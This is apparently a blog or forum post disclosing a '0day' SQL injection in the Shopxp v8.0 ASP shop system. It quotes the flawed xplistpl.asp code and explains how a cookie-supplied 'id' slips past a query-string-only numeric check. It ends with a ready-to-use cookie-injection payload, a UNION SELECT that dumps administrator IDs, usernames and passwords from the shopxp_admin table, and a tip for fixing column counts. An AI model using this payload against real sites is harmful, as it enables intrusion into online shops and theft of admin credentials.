Shopxp v8.0 SQL Injection 0day

Text/My5t3ry
Recently, I helped my friends read a website and found that shopxp was used. I went back to shopxp source code and read it. I found many vulnerabilities. Let's take a look at them. This system uses the early maple leaf anti-injection system, only filters GET and can bypass. Here we will not discuss the bypass problem. We can see that
Xplistpl. asp 9-36 lines of code:


<Table width = "100%" border = "0" cellspacing = "0" cellpadding = "0">
<Tr>
<Td width = "88%"> <TABLE cellSpacing = 0 cellPadding = 0 width = 100% align = center border = 0>
<TBODY>
<TR>
<Td width = "1" background = "img_shopxp/xiao/bgbg.gif"> </td>
<TD class = B vAlign = top align = left> <% if IsNumeric (request. QueryString ("id") = False then
Response. write ("<script> alert (" "illegal access! ""); Location. href = "" index. asp ""; </script> ")
Response. end
End if
Dim id
Id = request. QueryString ("id ")
If not isinteger (id) then
Response. write "<script> alert (" "illegal access! ""); Location. href = "" index. asp ""; </script>"
End if %>
<Table width = "100%" align = "center" border = "0" cellspacing = "0" cellpadding = "0" class = "table-zuoyou" bordercolor = "# CCCCCC">
<Tr>
<Td width = "100%" valign = "top" bordercolor = "# FFFFFF" bgcolor = "# FFFFFF" align = "center"> <table width = "100%" border =" 0 "cellspacing =" 0 "cellpadding =" 4 "align =" center ">
<%
Set rs = server. createobject ("adodb. recordset ")
Rs. open "select * from shopxp_product where shopxpptid =" & request ("id"), conn, 1, 3
If rs. recordcount> 0 then
Spmx = rs ("shopxpptname ")
End if %>
<Tr>
<Td colspan = "3" background = "img_shopxp/class_bg.jpg" height = 50> <a href = index. asp> <% = webname %> </a> product comment: <% = spmx %> </td>
</Tr>
</Table>


The above code has a logic vulnerability. Here, IsNumeric (request. QueryString ("id") = False is used to determine whether the obtained id is a number. If it is false, execution is stopped,
However, the id here is obtained through request. QueryString. What if we don't assign a value to the id? The following code can be used for verification:

<%
If IsNumeric (request. QueryString ("id") = False then
Response. write ("<script> alert (" "illegal access! ""); Location. href = "" index. asp ""; </script> ")
Response. end
End if
Response. write ("my5t3ry ")
%>


Save as test. asp and access test. asp directly to see if my5t3ry is printed? If you do not need to assign a value to the id using request. QueryString,
However, when the request. form or request. cookies assign values to the id, they can directly bypass his judgment. The Code will not stop executing and then enter
The SQL query uses request ("id"). All those who have learned asp know that requests use get, post, and cookie. Here, the bypass anti-injection function and the IsNumeric function are used to determine whether requests are handled.

Exploit:
Use Firefox to access the target site, and use the Firefox plug-in noscript to disable the site's javascript
Then clear the address bar and enter:
Javascript: alert (document. cookie = "id =" + escape ("1 union select 1, cstr (adminid) & chr (124) & admin & chr (124) & password, 9, 0, 9, 0, 1, 2, 3 from shopxp_admin "); location. href = "/xplistpl. asp ";

Ps: if the product comment is not displayed, most of them are caused by the number of fields.

: